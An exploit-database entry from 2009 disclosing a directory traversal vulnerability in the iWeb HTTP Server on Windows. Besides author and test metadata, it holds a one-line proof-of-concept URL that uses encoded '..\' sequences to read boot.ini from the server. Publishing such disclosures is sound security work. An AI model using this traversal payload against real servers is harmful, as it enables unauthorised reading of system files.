iWeb HTTP Server - Directory Traversal

EDB-ID:

10331

CVE:

N/A

Author:

mr_me

Type:

webapps

Platform:

Windows

Published:

2009-12-06

#################################################################
#
# iWeb HTTP server Directory Transversal Vulnerability
# Found By: mr_me
# Download: http://www.ashleybrown.co.uk/iweb/
# Tested On: Windows XPSP3
#
#################################################################

POC:

http://server/..%5C..%5C..%5Cboot.ini